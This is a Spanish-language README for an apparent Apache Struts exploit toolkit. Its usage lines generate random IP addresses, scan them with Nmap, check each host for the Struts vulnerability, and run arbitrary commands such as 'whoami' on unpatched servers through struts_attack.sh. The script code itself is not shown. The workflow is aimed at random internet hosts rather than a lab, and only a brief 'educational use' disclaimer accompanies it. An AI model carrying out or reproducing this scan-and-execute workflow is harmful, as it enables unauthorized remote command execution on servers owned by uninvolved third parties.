
Este proyecto es una prueba de concepto para la vulnerabilidad de Apache Struts. El objetivo era crear un software que pueda generar y probar IPs aleatorias para la vulnerabilidad descrita anteriormente.
Utilice este proyecto bajo su propio riesgo y solo con fines educativos.
cURL
Nmap
Generar IPs aleatorias y guardarlas en un archivo de texto.
./get_ip.sh [Número de hosts a escanear] [Qué puerto escanear] [Nombre del archivo para escribir la salida]
./get_ip.sh 10000 80 output.txt
Comprobar si una dirección IP específica es vulnerable.
./struts_check.sh [dirección ip] [puerto]
./struts_check.sh 127.0.0.1 80
Comprobar si una lista de direcciones IP es vulnerable.
./main.sh [Archivo de texto que contiene las direcciones IP] [Puerto]
./main.sh output.txt 443
Ejecutar un comando en un servidor sin el parche de la vulnerabilidad de Apache Struts.
./struts_attack.sh [Dirección IP] [Comando]
./struts_attack.sh https://127.0.0.1 whoami